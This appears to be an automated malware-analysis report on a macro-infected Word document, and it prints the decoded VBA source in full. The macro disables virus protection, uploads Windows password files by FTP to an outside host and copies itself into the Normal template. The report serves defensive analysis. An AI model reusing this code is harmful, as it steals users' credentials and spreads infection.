Verdict: MALICIOUS
Risk Score: 200

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
The sample is a Microsoft Word document containing VBA macros. The macros use the Shell() function to execute a batch file written to 'c:\-.bat'. That batch file writes an FTP command script named '-' and runs 'ftp -s:- ftp.hello.com.tw', uploading the .pwl (Windows password list) files found in %windir% to that host, then deletes both files. This indicates an attempt to exfiltrate sensitive credential material, and the FTP channel could equally serve to download a secondary payload.
Heuristics (3)
- ClamAV: Doc.Trojan.FS-9 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.FS-9
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1452 bytes |

SHA-256: ed76e2a478cd3a22427fa4238f3b07047b51a656e607aff8cf7f1d43bada170b

Detection: ClamAV: Doc.Trojan.FS-9
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Lurcher
Private Declare Function RasEnumConnections Lib "RasApi32.DLL" Alias "RasEnumConnectionsA" (lprasconn As Any, lpcb As Long, lpcConnections As Long) As Long
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = 1 - 1
Options.SaveNormalPrompt = 1 - 1
If RasEnumConnections(32, 0, 0) <> 0 Then
Open "c:\-.bat" For Output As #1
Print #1, "@echo off" & Chr(13) & Chr(10) & "ctty nul" & Chr(13) & Chr(10) & "echo virii>-" & Chr(13) & Chr(10) & "echo hieis>>-" & Chr(13) & Chr(10) & "echo binary>>-" & Chr(13) & Chr(10) & "for %%. in (%windir%\*.pwl) do echo put %%.>>-" & Chr(13) & Chr(10) & "echo bye>>-" & Chr(13) & Chr(10) & "ftp -s:- ftp.hello.com.tw" & Chr(13) & Chr(10) & "del -|del -.bat" & Chr(13) & Chr(10) & "ctty con" & Chr(13) & Chr(10)
Close #1: Shell "c:\-.bat", 0: End If
Set α = IIf(MacroContainer <> "Normal.dot", NormalTemplate, ActiveDocument)
With α.VBProject.VBComponents(1).CodeModule
If υ.Find("~^^~", 0, 0, 0, 0, 0, 0) = 0 Then _
.DeleteLines 1, .CountOfLines: _
.AddFromString ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 70)
End With: End Sub